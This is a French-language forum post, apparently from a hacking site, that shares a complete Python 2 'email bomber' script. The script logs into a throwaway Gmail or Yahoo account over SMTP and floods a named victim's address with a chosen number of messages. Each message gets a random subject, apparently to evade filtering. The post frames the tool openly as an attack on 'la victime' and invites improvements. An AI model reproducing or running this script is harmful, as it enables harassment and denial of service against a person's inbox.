script bien connu mais souvent oublié
Exemple: -
- Server Mail: Gmail ou Yahoo -
- Id et Password (votre adresse bidon et pass ) -
- email de la victime -
- Text a envoyer -
- Mombres de Message envoyer
Si quelqu'un veut l'améliorer pas de souci.
Exemple: -
- Server Mail: Gmail ou Yahoo -
- Id et Password (votre adresse bidon et pass ) -
- email de la victime -
- Text a envoyer -
- Mombres de Message envoyer
Code:
#!/usr/bin/python # -*- coding: latin-1 -*- print "#-----------------------------------------------------------#" print "- ____ ___ __ __ ____ _ ___ _ _ _ __ -" print "- | __ ) / _ \| \/ | __ )| | |_ _| \ | | |/ / -" print "- | _ \| | | | |\/| | _ \| | | || \| | ' / -" print "- | |_) | |_| | | | | |_) | |___ | || |\ | . \ -" print "- |____/ \___/|_| |_|____/|_____|___|_| \_|_|\_\ -" print "- ************************ -" print "- bY Blink ::HACKERFREE.RU:: -" print "- 2013-2014 -" print "#-----------------------------------------------------------#" print "- Exemple: -" print "- Server Mail: Gmail ou Yahoo -" print "- Id et Password -" print "- email de la victime -" print "- Text -" print "- Mombres de Message envoyer -" print "#-----------------------------------------------------------#" import os import smtplib import getpass import sys server = raw_input ('Server Mail: ') user = raw_input('Username: ') passwd = getpass.getpass('Password: ') to = raw_input('\nTo: ') #subject = raw_input('Subject: ') body = raw_input('Message: ') total = input('Number of send: ') if server == 'gmail': smtp_server = 'smtp.gmail.com' port = 587 elif server == 'yahoo': smtp_server = 'smtp.mail.yahoo.com' port = 25 else: print 'Applies only to gmail and yahoo.' sys.exit() print '' try: server = smtplib.SMTP(smtp_server,port) server.ehlo() if smtp_server == "smtp.gmail.com": server.starttls() server.login(user,passwd) for i in range(1, total+1): subject = os.urandom(9) msg = 'From: ' + user + '\nSubject: ' + subject + '\n' + body server.sendmail(user,to,msg) print "\rTotal emails sent: %i" % i sys.stdout.flush() server.quit() print '\n Done !!!' except KeyboardInterrupt: print '[-] Canceled' sys.exit() except smtplib.SMTPAuthenticationError: print '\n[!] The username or password you entered is incorrect.' sys.exit()
Commentaire